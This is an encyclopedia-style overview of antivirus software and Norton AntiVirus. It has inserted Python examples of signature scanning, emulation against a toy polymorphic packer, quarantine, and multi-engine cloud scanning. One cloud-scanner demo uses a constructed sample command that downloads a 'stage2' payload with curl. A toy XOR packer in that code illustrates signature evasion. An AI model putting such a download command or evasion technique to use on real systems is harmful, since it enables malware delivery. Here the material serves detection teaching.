
Antivirus or anti-virus software is used to prevent, detect, and remove computer viruses, worms, and trojan horses. It may also prevent and remove adware, spyware, and other forms of malware. This page discusses the software used for the prevention and removal of such threats, rather than computer security implemented by software methods in general.

A variety of strategies are typically employed. Signature-based detection involves searching for known patterns of data within executable code. However, a computer can be infected with new malware for which no signature is yet known. To counter such so-called zero-day threats, heuristics can be used. One type of heuristic approach, generic signatures, can identify new viruses or variants of existing viruses by looking for known malicious code, or slight variations of such code, in files. Some antivirus software can also predict what a file will do by running it in a sandbox and analyzing its behaviour to see whether it performs any malicious actions.

However useful antivirus software can be, it has drawbacks. Antivirus software can impair a computer's performance. Inexperienced users may also have trouble understanding the prompts and decisions that antivirus software presents them with, and an incorrect decision may lead to a security breach. If the antivirus software employs heuristic detection, success depends on achieving the right balance between false positives and false negatives; false positives can be as destructive as false negatives. Finally, antivirus software generally runs at the highly trusted kernel level of the operating system, creating a potential avenue of attack.[1]


History

An example of free antivirus software: ClamTk 3.08.


Most of the computer viruses written in the early and mid 1980s were limited to self-reproduction and had no specific damage routine built into the code.[2] That changed when more and more programmers became acquainted with virus programming and created viruses that manipulated or even destroyed data on infected computers.

There are competing claims for the innovator of the first antivirus product. Possibly the first publicly
documented removal of a computer virus in the wild was performed by Bernd Fix in 1987.[3][4]

Fred Cohen, who published one of the first academic papers on computer viruses in 1984,[5] began to develop strategies for antivirus software in 1988[6] that were picked up and continued by later antivirus software developers.[7]

Also in 1988 a mailing list named VIRUS-L was started on the BITNET/EARN network where new viruses and the possibilities of detecting and eliminating viruses were discussed. Some members of this mailing list, like John McAfee or Eugene Kaspersky, later founded software companies that developed and sold commercial antivirus software.

Before internet connectivity was widespread, viruses were typically spread by infected floppy disks. Antivirus software came into use, but was updated relatively infrequently. During this time, virus checkers essentially had to check executable files and the boot sectors of floppy disks and hard disks. However, as internet usage became common, viruses began to spread online.[8]

Over the years it has become necessary for antivirus software to check an increasing variety of files, rather than just executables, for several reasons:

- Powerful macros used in word processor applications, such as Microsoft Word, presented a risk. Virus writers could use the macros to write viruses embedded within documents. This meant that computers could now also be at risk from infection by opening documents with hidden attached macros.[9]
- Later email programs, in particular Microsoft's Outlook Express and Outlook, were vulnerable to viruses embedded in the email body itself. A user's computer could be infected by just opening or previewing a message.[10]

As always-on broadband connections became the norm, and more and more viruses were released, it
became essential to update virus checkers more and more frequently. Even then, a new zero-day
virus could become widespread before antivirus companies released an update to protect against it.

Identification methods

Malwarebytes' Anti-Malware version 1.46 - a proprietary freeware antimalware product

There are several methods which antivirus software can use to identify malware.

Signature-based detection is the most common method. To identify viruses and other malware, antivirus software compares the contents of a file to a dictionary of virus signatures. Because viruses can embed themselves in existing files, the entire file is searched, not just as a whole, but also in pieces.[11]

Heuristic-based detection, like malicious activity detection, can be used to identify unknown viruses.

File emulation is another heuristic approach. File emulation involves executing a program in a virtual environment and logging what actions the program performs. Depending on the actions logged, the antivirus software can determine if the program is malicious or not and then carry out the appropriate disinfection actions.[12]
Signature-based detection
Traditionally, antivirus software heavily relied upon signatures to identify malware. This can be very
effective, but cannot defend against malware unless samples have already been obtained and signatures
created. Because of this, signature-based approaches are not effective against new, unknown viruses.

As new viruses are being created each day, the signature-based detection approach requires frequent
updates of the virus signature dictionary. To assist the antivirus software companies, the software may
allow the user to upload new viruses or variants to the company, allowing the virus to be analyzed and
the signature added to the dictionary.[11]

Although the signature-based approach can effectively contain virus outbreaks, virus authors have tried to
stay a step ahead of such software by writing "oligomorphic", "polymorphic" and, more recently,
"metamorphic" viruses, which encrypt parts of themselves or otherwise modify themselves as a method of
disguise, so as to not match virus signatures in the dictionary.[13]
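To make concrete why a fixed signature fails against a polymorphic variant, and what the file emulation described under Identification methods buys back, the following toy is added here; it is not code from any product and not a real packer. A made-up packer XOR-encrypts a constructed payload with a fresh key each generation and prepends a decryptor stub written in a six-opcode bytecode invented for the example, padding the stub with random NOPs so the stub bytes vary too. A bounded emulator runs the stub, and the decrypted memory is then searched for the payload signature.

```python
import random
from typing import Optional

PAYLOAD = b"MALICIOUS_PAYLOAD_DO_BAD_THINGS"      # constructed stand-in for malicious code
SIGNATURE = b"PAYLOAD_DO_BAD"                      # a fixed signature for the plaintext

# Opcodes of the made-up bytecode: one byte each; SETKEY/SETPTR/LOOP take a one-byte operand.
NOP, SETKEY, SETPTR, XORMEM, INCPTR, LOOP, EXEC = range(7)


def pack(payload: bytes, key: int, junk: int) -> bytes:
    """One polymorphic generation: NOP padding, a decryptor stub, then the body
    XOR-encrypted with this generation's key."""
    assert 1 <= key <= 255
    nops = bytes([NOP]) * junk
    stub_len = len(nops) + 9            # the layout below is 9 bytes after the NOPs
    xormem_at = len(nops) + 4           # loop target: the XORMEM instruction
    stub = nops + bytes([SETKEY, key, SETPTR, stub_len,
                         XORMEM, INCPTR, LOOP, xormem_at, EXEC])
    return stub + bytes(b ^ key for b in payload)


def emulate(sample: bytes, budget: int = 10_000) -> Optional[bytes]:
    """Run the sample in the toy VM. Returns the memory image at EXEC (after the
    stub has decrypted the body), or None if the sample is not our bytecode or
    does not reach EXEC within the instruction budget."""
    mem = bytearray(sample)
    pc, key, ptr = 0, 0, len(mem)

    def operand() -> Optional[int]:
        return mem[pc + 1] if pc + 1 < len(mem) else None

    for _ in range(budget):
        if pc >= len(mem):
            return None
        op = mem[pc]
        if op == NOP:
            pc += 1
        elif op in (SETKEY, SETPTR, LOOP):
            arg = operand()
            if arg is None:
                return None
            if op == SETKEY:
                key = arg
            elif op == SETPTR:
                ptr = arg
            elif ptr < len(mem):           # LOOP: jump back while body remains
                pc = arg
                continue
            pc += 2
        elif op == XORMEM:
            if ptr < len(mem):
                mem[ptr] ^= key
            pc += 1
        elif op == INCPTR:
            ptr += 1
            pc += 1
        elif op == EXEC:
            return bytes(mem)
        else:
            return None                    # unknown opcode: not a stub
    return None                            # budget exhausted: refuse rather than hang


def static_scan(sample: bytes) -> bool:
    return SIGNATURE in sample


def emulated_scan(sample: bytes) -> bool:
    """Emulate first; if the sample is not a stub, scan the raw bytes instead."""
    mem = emulate(sample)
    return SIGNATURE in (mem if mem is not None else sample)


def demo(seed: int = 7, generations: int = 5) -> dict:
    rng = random.Random(seed)
    keys = rng.sample(range(1, 256), generations)       # distinct keys, distinct samples
    samples = [pack(PAYLOAD, k, rng.randrange(0, 4)) for k in keys]
    return {
        "distinct_samples": len(set(samples)),
        "static_hits": sum(static_scan(s) for s in samples),
        "emulated_hits": sum(emulated_scan(s) for s in samples),
    }


if __name__ == "__main__":
    print(demo())       # {'distinct_samples': 5, 'static_hits': 0, 'emulated_hits': 5}
```

The instruction budget is the important safety detail: a sample that loops forever, or whose first byte is not a known opcode, returns `None` instead of hanging the scanner, and the scanner then falls back to the raw bytes. Real emulators face the same trade-off at far larger scale, which is why packers add time-wasting loops to exhaust the budget before the real decryptor runs.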
Heuristics

Some more sophisticated antivirus software uses heuristic analysis to identify new malware or variants of
known malware.

Many viruses start as a single infection and, through either mutation or refinements by other attackers, can grow into dozens of slightly different strains, called variants. Generic detection refers to the detection and removal of multiple threats using a single virus definition.[14]

For example, the Vundo trojan has several family members, depending on the antivirus vendor's classification. Symantec classifies members of the Vundo family into two distinct categories.[15][16]

While it may be advantageous to identify a specific virus, it can be quicker to detect a virus family through a generic signature or through an inexact match to an existing signature. Virus researchers find common areas that all viruses in a family share uniquely and can thus create a single generic signature. These signatures often contain non-contiguous code, using wildcard characters where differences lie. These wildcards allow the scanner to detect viruses even if they are padded with extra, meaningless code.[17] A detection that uses this method is said to be "heuristic detection."
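As an added illustration of the signature dictionary described under Identification methods (the whole file searched in pieces) and of the wildcard-bearing generic signatures just discussed, here is a small scanner written for this page; it is not code from any antivirus product. The signature syntax (hex bytes, `??` for one wildcard byte, `[n-m]` for a variable-length gap) is modelled on the ClamAV convention, and the signature entries and the sample bytes are constructed for the demonstration.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Constructed signature dictionary: name -> hex signature. "??" matches any one
# byte; "[n-m]" matches between n and m arbitrary bytes, so a variant padded
# with junk inside the gap still matches.
SIGNATURES: Dict[str, str] = {
    "EICAR-prefix": "58354F2150254041505B345C505A58",   # first 15 bytes of the EICAR test string
    "Demo-generic": "DEADBEEF??CAFE[2-6]F00D",          # made-up family signature
}

Compiled = Dict[str, Tuple[re.Pattern, int]]


def compile_signature(hex_sig: str) -> Tuple[re.Pattern, int]:
    """Turn the hex/wildcard syntax into a bytes regex and return with it the
    longest span the signature can match (used to size the chunk overlap)."""
    parts: List[bytes] = []
    longest = 0
    i = 0
    while i < len(hex_sig):
        if hex_sig[i:i + 2] == "??":
            parts.append(b".")
            longest += 1
            i += 2
        elif hex_sig[i] == "[":
            j = hex_sig.index("]", i)
            lo, hi = (int(x) for x in hex_sig[i + 1:j].split("-"))
            parts.append(b".{%d,%d}" % (lo, hi))
            longest += hi
            i = j + 1
        else:
            parts.append(re.escape(bytes.fromhex(hex_sig[i:i + 2])))
            longest += 1
            i += 2
    return re.compile(b"".join(parts), re.DOTALL), longest


def compile_all(sigs: Dict[str, str]) -> Compiled:
    return {name: compile_signature(s) for name, s in sigs.items()}


def scan_chunks(chunks: Iterable[bytes], compiled: Compiled) -> List[Tuple[str, int]]:
    """Scan a file delivered in pieces. The tail of each chunk (one byte short
    of the longest possible match) is carried into the next one, so a signature
    straddling a chunk boundary is still found. Hits are (name, absolute
    offset), de-duplicated across the overlap."""
    overlap = max(longest for _, longest in compiled.values()) - 1
    carry = b""
    offset = 0                      # absolute offset of carry[0]
    hits: List[Tuple[str, int]] = []
    seen = set()
    for chunk in chunks:
        buf = carry + chunk
        for name, (pattern, _) in compiled.items():
            for m in pattern.finditer(buf):
                hit = (name, offset + m.start())
                if hit not in seen:
                    seen.add(hit)
                    hits.append(hit)
        keep = min(overlap, len(buf))
        offset += len(buf) - keep
        carry = buf[len(buf) - keep:]
    return hits


def scan_file(path: str, compiled: Compiled, chunk_size: int = 1 << 16) -> List[Tuple[str, int]]:
    with open(path, "rb") as f:
        return scan_chunks(iter(lambda: f.read(chunk_size), b""), compiled)


# Constructed sample "file": 10 bytes of padding, a Demo-generic variant with
# four junk bytes inside the gap, then some trailing bytes.
SAMPLE = (b"A" * 10 + bytes.fromhex("DEADBEEF") + b"\x99" + bytes.fromhex("CAFE")
          + b"PAD!" + bytes.fromhex("F00D") + b"B" * 5)


def demo(chunk_size: int = 13) -> List[Tuple[str, int]]:
    """Deliver SAMPLE in chunks of the given size; 13 puts the boundary in the
    middle of the match, and 1 delivers the file a byte at a time."""
    chunks = [SAMPLE[i:i + chunk_size] for i in range(0, len(SAMPLE), chunk_size)]
    return scan_chunks(chunks, compile_all(SIGNATURES))


if __name__ == "__main__":
    print(demo())          # [('Demo-generic', 10)]
```

The overlap carried between chunks is what lets a pattern that straddles a chunk boundary be found without rescanning the whole file, and it only works because the longest possible match of every signature is known in advance. That is also the cost of generic signatures: a `[n-m]` gap makes the pattern more expensive to match than a fixed string and widens the overlap, which is why vendors bound gap lengths.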
Rootkit detection

Anti-virus software can also scan for rootkits; a rootkit is a type of malware that is designed to gain
administrative-level control over a computer system without being detected. Rootkits can change how
the operating system functions and in some cases can tamper with the anti-virus program and render it
ineffective. Rootkits are also difficult to remove, in some cases requiring a complete re-installation of the
operating system.[18][19]

Issues of concern

Unexpected renewal costs

Some commercial antivirus software end-user license agreements include a clause that the subscription will be automatically renewed, and the purchaser's credit card automatically billed, at the renewal time without explicit approval. For example, McAfee requires users to unsubscribe at least 60 days before the expiration of the present subscription,[20] while BitDefender sends notifications to unsubscribe 30 days before the renewal.[21] Norton AntiVirus also renews subscriptions automatically by default.[22]
Rogue security applications

Some apparent antivirus programs are actually malware masquerading as legitimate software, such as WinFixer and MS Antivirus.[23]
Problems caused by false positives

A "false positive" is when antivirus software identifies a non-malicious file as a virus. When this happens, it can cause serious problems. For example, if an antivirus program is configured to immediately delete or quarantine infected files, a false positive in an essential file can render the operating system or some applications unusable.[24] In May 2007, a faulty virus signature issued by Symantec mistakenly removed essential operating system files, leaving thousands of PCs unable to boot.[25] Also in May 2007 the executable file required by Pegasus Mail was falsely detected by Norton AntiVirus as being a Trojan and was automatically removed, preventing Pegasus Mail from running.[26] Norton AntiVirus has falsely identified three releases of Pegasus Mail as malware, deleting the Pegasus Mail installer file each time.[27] Pegasus Mail responded with a public statement.
In April 2010 McAfee VirusScan detected svchost.exe, a normal Windows binary, as a virus on machines running Windows XP with Service Pack 3, causing a reboot loop and loss of all network access.[28][29]

In December 2010, a faulty update on the AVG anti-virus suite damaged 64-bit versions of Windows 7, rendering them unable to boot because of an endless boot loop.[30]

When Microsoft Windows becomes damaged by faulty anti-virus products, fixing the damage to Microsoft Windows incurs technical support costs, and businesses can be forced to close whilst remedial action is undertaken.[31][32]
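The incidents above share one failure mode: a detection that deletes or moves a file with no way back. The following quarantine routine is an added example written for this page, not code from any of the products named, and it shows the two mitigations a practitioner would want. Files are moved, not deleted, under a manifest that records the original path and a SHA-256 so they can be restored, and paths under a configurable list of protected directories are never auto-quarantined, only reported. The directory and file names (`system32`, `svchost.exe`, `invoice.exe`) and the detection names are constructed for the demo.

```python
import hashlib
import json
import secrets
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List, Optional


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


class Quarantine:
    """Move detections aside instead of deleting them, keep enough metadata to
    undo the move, and never auto-quarantine inside protected directories."""

    def __init__(self, root: Path, protected: List[Path]):
        self.root = Path(root)
        self.root.mkdir(parents=True, exist_ok=True)
        self.manifest = self.root / "manifest.json"
        self.protected = [Path(p).resolve() for p in protected]
        self.entries: Dict[str, dict] = (
            json.loads(self.manifest.read_text()) if self.manifest.exists() else {})

    def _save(self) -> None:
        self.manifest.write_text(json.dumps(self.entries, indent=1))

    def is_protected(self, path: Path) -> bool:
        p = Path(path).resolve()
        return any(p == d or d in p.parents for d in self.protected)

    def quarantine(self, path: Path, detection: str) -> Optional[str]:
        """Return the quarantine id, or None when the file lives under a
        protected directory (report only; a human decides)."""
        path = Path(path)
        if self.is_protected(path):
            return None
        qid = secrets.token_hex(8)
        entry = {"original": str(path.resolve()), "sha256": sha256_of(path),
                 "detection": detection}
        shutil.move(str(path), str(self.root / qid))
        self.entries[qid] = entry
        self._save()
        return qid

    def restore(self, qid: str) -> Path:
        """Undo a quarantine after checking the file was not altered meanwhile."""
        entry = self.entries[qid]
        src = self.root / qid
        if sha256_of(src) != entry["sha256"]:
            raise RuntimeError("quarantined file was altered; refusing to restore")
        dst = Path(entry["original"])
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.move(str(src), str(dst))
        del self.entries[qid]
        self._save()
        return dst


def demo() -> dict:
    """Constructed scenario: a false positive on an OS binary and a real
    detection in a download folder, then an operator restoring the latter."""
    base = Path(tempfile.mkdtemp())
    try:
        sys_dir = base / "system32"
        sys_dir.mkdir()
        os_bin = sys_dir / "svchost.exe"
        os_bin.write_bytes(b"MZ legitimate OS binary")
        dl = base / "Downloads" / "invoice.exe"
        dl.parent.mkdir()
        dl.write_bytes(b"MZ suspicious download")

        q = Quarantine(base / "quarantine", protected=[sys_dir])
        blocked = q.quarantine(os_bin, "Generic.FalsePositive")   # protected: report only
        qid = q.quarantine(dl, "Trojan.Generic")                   # moved aside
        moved = not dl.exists()
        restored = q.restore(qid)
        return {
            "protected_skipped": blocked is None,
            "os_file_intact": os_bin.exists(),
            "moved": moved,
            "restored": restored == dl.resolve() and dl.read_bytes() == b"MZ suspicious download",
            "manifest_empty": q.entries == {},
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)
```

`restore()` checks the stored hash before moving the file back, so a quarantine directory that has been tampered with cannot be used to reintroduce a different file under a trusted path. The protected-path list is deliberately a policy knob rather than a hard-coded set: with the OS directories on it, a bad signature for an essential binary produces a report to act on instead of a machine that no longer boots.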
System and interoperability related issues

Running multiple antivirus programs concurrently can degrade performance and create conflicts.[33] However, using a concept called multiscanning, several companies (including G Data[34] and Microsoft[35]) have created applications which can run multiple engines concurrently.

It is sometimes necessary to temporarily disable virus protection when installing major updates such as
Windows Service Packs or updating graphics card drivers.[36] Active antivirus protection may partially or
completely prevent the installation of a major update.

Active anti-virus programs can cause conflicts with other programs. For example,
the TrueCrypt troubleshooting page reports that anti-virus programs are known to conflict with TrueCrypt
and cause it to malfunction.[37]

Support issues also exist around antivirus application interoperability with common solutions like SSL
VPN remote access and network access control products.[38] These technology solutions often have
policy assessment applications which require that an up to date antivirus is installed and running. If the
antivirus application is not recognized by the policy assessment, whether because the antivirus
application has been updated or because it is not part of the policy assessment library, the user will be
unable to connect.
Effectiveness

Studies in December 2007 showed that the effectiveness of antivirus software had decreased in the previous year, particularly against unknown or zero-day attacks. One computer magazine found that detection rates for these threats had dropped from 40-50% in 2006 to 20-30% in 2007. At that time, the only exception was the NOD32 antivirus, which managed a detection rate of 68 percent.[39]

The problem is magnified by the changing intent of virus authors. Some years ago it was obvious when a virus infection was present. The viruses of the day, written by amateurs, exhibited destructive behavior or pop-ups. Modern viruses are often written by professionals, financed by criminal organizations.[40]

Independent testing of all the major virus scanners consistently shows that none provides 100% virus detection. The best ones provided as high as 99.6% detection, while the lowest provided only 81.8%, in tests conducted in February 2010. All virus scanners produce false positive results as well, identifying benign files as malware.[41]

Although methodologies may differ, some notable independent quality testing agencies include AV-Comparatives, ICSA Labs, West Coast Labs, VB100 and other members of the Anti-Malware Testing Standards Organization.[42]
New viruses

Most popular anti-virus programs are not very effective against new viruses, even those that use non-signature-based methods that should detect new viruses. The reason for this is that the virus designers test their new viruses on the major anti-virus applications to make sure that they are not detected before releasing them into the wild.[43]

Some new viruses, particularly ransomware, use polymorphic code to avoid detection by virus scanners, as Jerome Segura, a security analyst with ParetoLogic, has explained.[44]
A proof-of-concept malware has shown how new viruses could use the Graphics Processing Unit (GPU) to avoid detection by anti-virus software. The potential success of this involves bypassing the CPU in order to make it much harder for security researchers to analyse the inner workings of such malware.[45]
Rootkits

The detection of rootkits is a major challenge for anti-virus programs. Rootkits are extremely difficult to detect and, if undetected, have full administrative access to the computer and are invisible to users, so that they will not be shown in the list of running processes in the task manager. Rootkits can modify the inner workings of the operating system[46] and tamper with antivirus programs.[18]
Damaged files

Files which have been damaged by computer viruses are normally damaged beyond recovery. Anti-virus software removes the virus code from the file during disinfection, but this does not always restore the file to its undamaged state. In such circumstances, damaged files can only be restored from existing backups.[47]

Other methods

A command-line virus scanner, Clam AV 0.95.2, running a virus signature definition update, scanning a file and identifying a
Trojan

Installed antivirus software running on an individual computer is only one method of guarding against
viruses. Other methods are also used, including cloud-based antivirus, firewalls and on-line scanners.
Cloud antivirus

Cloud antivirus is a technology that uses lightweight agent software on the protected computer, while offloading the majority of data analysis to the provider's infrastructure.[48]

One approach to implementing cloud antivirus involves scanning suspicious files using multiple antivirus
engines. This approach was proposed by an early implementation of the cloud antivirus concept called
CloudAV. CloudAV was designed to send programs or documents to a network cloud where multiple
antivirus and behavioral detection programs are used simultaneously in order to improve detection rates.
Parallel scanning of files using potentially incompatible antivirus scanners is achieved by spawning a
virtual machine per detection engine and therefore eliminating any possible issues. CloudAV can also
perform "retrospective detection," whereby the cloud detection engine rescans all files in its file access
history when a new threat is identified thus improving new threat detection speed. Finally, CloudAV is a
solution for effective virus scanning on devices that lack the computing power to perform the scans
themselves.[49]
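The following is an added sketch, not CloudAV's code, of the two mechanisms just described: fan-out of one file to several engines with a vote threshold, and retrospective detection from the access history. Engines are modelled as Python callables (one updatable substring-signature engine and one constructed behavioural rule), threads stand in for the per-engine virtual machines, and the client names, files and signatures are made up for the demo.

```python
import hashlib
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, List, Set

Engine = Callable[[bytes], bool]            # True = "malicious"


class SignatureEngine:
    """A substring-signature engine whose dictionary can grow after deployment."""

    def __init__(self, patterns: Iterable[bytes]):
        self.patterns: Set[bytes] = set(patterns)

    def add(self, pattern: bytes) -> None:
        self.patterns.add(pattern)

    def __call__(self, data: bytes) -> bool:
        return any(p in data for p in self.patterns)


def behaviour_engine(data: bytes) -> bool:
    """Constructed behavioural rule: a script that both spawns a shell and
    fetches from the network is flagged."""
    return b"cmd.exe /c" in data and b"http://" in data


class CloudScanner:
    def __init__(self, engines: Dict[str, Engine], min_votes: int = 1):
        self.engines = dict(engines)
        self.min_votes = min_votes
        self.blobs: Dict[str, bytes] = {}           # sha256 -> content (unique files only)
        self.history: Dict[str, Set[str]] = {}      # sha256 -> clients that accessed it
        self.verdicts: Dict[str, bool] = {}         # sha256 -> current verdict

    def _votes(self, data: bytes) -> List[str]:
        # Every engine sees the file concurrently; CloudAV used one VM per
        # engine, a thread pool stands in for that here.
        with ThreadPoolExecutor(max_workers=len(self.engines)) as pool:
            flags = list(pool.map(lambda e: e(data), self.engines.values()))
        return sorted(name for name, hit in zip(self.engines, flags) if hit)

    def submit(self, client: str, data: bytes) -> dict:
        """Agent side: upload the file (a real agent would send a hash first
        and only upload unseen content); the server scans unique content once."""
        h = hashlib.sha256(data).hexdigest()
        self.history.setdefault(h, set()).add(client)
        if h not in self.verdicts:
            self.blobs[h] = data
            self.verdicts[h] = len(self._votes(data)) >= self.min_votes
        return {"sha256": h, "malicious": self.verdicts[h]}

    def retrospective_rescan(self) -> Dict[str, Set[str]]:
        """After an engine learns something new, rescan every file previously
        judged clean and return {sha256: clients that already ran it}."""
        newly_bad: Dict[str, Set[str]] = {}
        for h, bad in list(self.verdicts.items()):
            if not bad and len(self._votes(self.blobs[h])) >= self.min_votes:
                self.verdicts[h] = True
                newly_bad[h] = set(self.history[h])
        return newly_bad


def demo() -> dict:
    sigs = SignatureEngine([b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"])
    cloud = CloudScanner({"signatures": sigs, "behaviour": behaviour_engine})
    report = b"Q3 report: revenue up, nothing else to see"                  # constructed inputs
    script = b"cmd.exe /c curl http://203.0.113.9/stage2 -o %TEMP%\\s.exe"
    dropper = b"MZ\x90\x00 DROPPER_V2 build 7"
    r_report = cloud.submit("laptop-1", report)
    r_script = cloud.submit("laptop-1", script)
    r_drop1 = cloud.submit("laptop-1", dropper)      # unknown at this point: passes
    cloud.submit("laptop-2", dropper)                # same file, second client
    sigs.add(b"DROPPER_V2")                          # the vendor learns about it later
    late = cloud.retrospective_rescan()
    return {
        "report": r_report["malicious"],
        "script": r_script["malicious"],
        "dropper_first_seen": r_drop1["malicious"],
        "dropper_sha": r_drop1["sha256"],
        "retro": {h: sorted(c) for h, c in late.items()},
    }
```

`min_votes` is the knob that trades false positives for misses: with one vote, a single over-eager engine can block a file fleet-wide (the false-positive problem from the previous section, now centralized), while requiring two means a file only one engine knows about is let through. Keying blobs and verdicts by hash also keeps the retrospective rescan proportional to unique content rather than to the number of submissions.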
Network firewall

Network firewalls prevent unknown programs and processes from accessing the system. However, they
are not antivirus systems and make no attempt to identify or remove anything. They may protect against
infection from outside the protected computer or network, and limit the activity of any malicious software
which is present by blocking incoming or outgoing requests on certain TCP/IP ports. A firewall is designed
to deal with broader system threats that come from network connections into the system and is not an
alternative to a virus protection system.
Online scanning
Some antivirus vendors maintain websites with free online scanning capability of the entire computer,
critical areas only, local disks, folders or files.
Specialist tools

Using rkhunter to scan for rootkits on an Ubuntu Linux computer.

Virus removal tools are available to help remove stubborn infections or certain types of infection. Examples include a rootkit detection tool from Trend Micro[50] and rkhunter for the detection of rootkits, a removal tool from Avira,[51] and AVG's various virus removal tools.[52]

A bootable rescue disk, such as a CD or USB storage device, can be used to run antivirus software outside of the installed operating system, in order to remove infections while they are dormant. A bootable antivirus disk can be useful when, for example, the installed operating system is no longer bootable or has malware that is resisting all attempts to be removed by the installed antivirus software. Several vendors offer such bootable disks.[53][54] The AVG Rescue CD software can also be installed onto a USB storage device that is bootable on newer computers.[55]

Popularity

A survey by Symantec in 2009 found that a third of small to medium sized businesses did not use antivirus protection at that time, whereas more than 80% of home users had some kind of antivirus installed.[56]

Norton AntiVirus
From Wikipedia, the free encyclopedia


Norton AntiVirus, developed and distributed by Symantec Corporation, provides malware prevention and removal during a subscription period. It uses signatures and heuristics to identify viruses. Other features include e-mail spam filtering and phishing protection.

Symantec distributes the product as a download, a boxed copy, and as OEM software. Norton AntiVirus and Norton Internet Security, a related product, held a 61% US retail market share for security suites as of the first half of 2007. Competitors, in terms of market share in this study, include antivirus products from CA, Trend Micro, and Kaspersky Lab.[1]

Norton AntiVirus runs on Microsoft Windows and Mac OS X.[2] Version 17.5.0.127 is the latest Windows build. Windows 7 support is in development for versions 2006 through 2008. Version 2009 already has a Windows 7 support update. Version 2010 natively supports Windows 7, without needing an update. Version 11.1.1 is the latest Mac build.


Windows edition

In August 1990 Symantec acquired Peter Norton Computing from Peter Norton.[3] Norton and his company developed various utilities, or applications for DOS, including an antivirus. Symantec continued the development of the acquired technologies. The technologies are marketed under the name of "Norton", with the tagline "from Symantec". Norton's crossed-arm pose, a registered U.S. trademark, was traditionally featured on Norton product packaging.[4] However, his pose was later moved to the spine of the packaging, and eventually dropped altogether.[5]
Product activation was introduced in Norton AntiVirus 2004, addressing the estimated 3.6 million counterfeit Norton products sold. An alphanumeric code is generated to identify a computer's configuration, which ties in with the product key. Users are allowed to activate their product five times with the same product key.[6] Spyware and adware detection and removal was introduced in the 2005 version, with the tagline "Antispyware Edition".[7] The tagline was dropped in later releases. However, Norton AntiVirus 2009 Classic does not include spyware or adware detection. The Classic edition is marketed alongside Norton AntiVirus 2009, which does include spyware and adware detection.

Existing users of the 2006, 2007, 2008 and 2009 versions can upgrade to the latest 2010 version without buying a new subscription.[8] Upgrading will preserve the number of days left on a user's subscription.

Norton AntiVirus 2006

The redesigned main graphical user interface aggregates information in a central user interface.[9] CNET reports that the Norton Protection Center, while useful, attempts to advertise additional products. To further facilitate detection of zero-day malware, Bloodhound disassembles a variety of programming languages and scans code for malicious instructions using predefined algorithms.[10] Internet Explorer homepage hijacking protection was introduced in this release as well; however, search engine hijacking protection is notably missing. CNET highlighted Norton AntiVirus 2006's noticeable impact on system performance.[9]

Operating system requirements call for Windows 2000 Service Pack 3 or Windows XP. 150 MB of free space and a 300 MHz processor are required under either operating system. 128 MB of RAM is required under Windows 2000, while 256 MB is required in Windows XP.[9]

Norton AntiVirus 2007

Norton AntiVirus 2007 was released on September 12, 2006.[11] Symantec revised Norton AntiVirus with the goal of reducing high system resource utilization.[12] Windows Vista compatibility was introduced in this release as well. Despite having about 80% of the code rewritten, CNET reports mixed results in performance testing.[13] New features include a tabbed interface, eliminating the need to have separate windows open for the Norton Protection Center and for configuring the settings.[13] Symantec extended its Veritas VxMS rootkit detection technology, allowing Norton AntiVirus 2007 to compare files within directories against files at the volume level, detecting abnormalities or inconsistencies.[13]

Windows 2000 compatibility was dropped from this release. Compatibility with 32-bit versions of Windows Vista was added to this release with a patch from Symantec. Hardware requirements under Vista call for 150 MB free space, an 800 MHz processor and 512 MB RAM. Requirements under Windows XP similarly call for 150 MB free space, a 300 MHz processor, and 256 MB of RAM.

Norton AntiVirus 2008

Norton AntiVirus 2008 was released on August 28, 2007. Emphasizing malware prevention, new features include SONAR, which looks for suspicious application behavior. This release adds real-time exploit protection, preventing attackers from leveraging common browser and application vulnerabilities.[14][15]

When installed in 32-bit versions of Windows XP Service Pack 2, 300 MB of free space, a 300 MHz processor, and 256 MB of RAM are required. When installed in 32-bit and 64-bit versions of Windows Vista, 300 MB of free space, an 800 MHz processor, and 256 MB of RAM are needed.

Norton AntiVirus 2009

The main user interface of Norton AntiVirus 2009

Norton AntiVirus 2009 was released on September 8, 2008. Addressing performance issues, over 300 changes were made, with a "zero-impact" goal.[16][17] Benchmarking conducted by Passmark Software PTY LTD highlights its 47 second install time, 32 second scan time, and 5 MB memory utilization. It should be noted that Symantec funded the benchmark test and provided some scripts used to benchmark each participating antivirus product.[18]

The security status and settings are now displayed in a single main interface. A CPU usage monitor displays the total CPU utilization and Norton's CPU usage in the main interface. Other features include Norton Insight, a whitelisting technology which cuts scanning times by mapping known safe files using information from an online database.[19] To address malware response times, updates are delivered every 5 to 15 minutes. However, such updates are not tested by Symantec, and may cause false positives, incorrectly identifying files as malicious. The exploit scanner found in the 2007 and 2008 versions was dropped from this release.

When installed in 32-bit versions of Windows XP Service Pack 2, 150 MB of free space, a 300 MHz processor, and 256 MB of RAM are required. When installed in 32-bit or 64-bit versions of Windows Vista, 150 MB of free space, an 800 MHz processor, and 512 MB of RAM are required.

Gaming and Classic editions

Two variations on Norton AntiVirus 2009 are also marketed by Symantec. The Gaming edition provides finer control over when Norton downloads updates and allows components of the suite to be disabled either manually or automatically when the computer enters full-screen mode.

The Classic edition cannot find or remove adware and spyware.

Norton AntiVirus 2010

The main GUI of Norton AntiVirus 2010

Version 17.0 was released on September 9, 2009.[20] Several features have been updated in this release, including SONAR, now dubbed SONAR 2. It now uses more information to determine if an application is truly malicious. Norton Insight can present users with information about the origins, activities, and performance of applications along with reputation data.[20] A new feature helps users understand what Norton did when malware was found. Previous releases removed threats on sight and quietly warned users, which was potentially confusing when users had been deceived into downloading rogue security software. Much of this information is placed on the back of the main window; a toggle button switches between the sides.[21] Symantec has also added Windows 7 support. Aside from that, Symantec has also added Norton Download Insight to prevent drive-by downloads.

Norton AntiVirus 2011

The main GUI of Norton AntiVirus 2011

Norton AntiVirus 2011 Beta was released on April 21, 2010. Changes include a new user interface and improved scanning of internet sites for malware. With the 2011 version, Symantec also released an application that "scans" the user's Facebook feed for any malware links.[22] This application does not require a valid subscription. The final version of Norton AntiVirus 2011 was released on August 31, 2010.

Macintosh edition

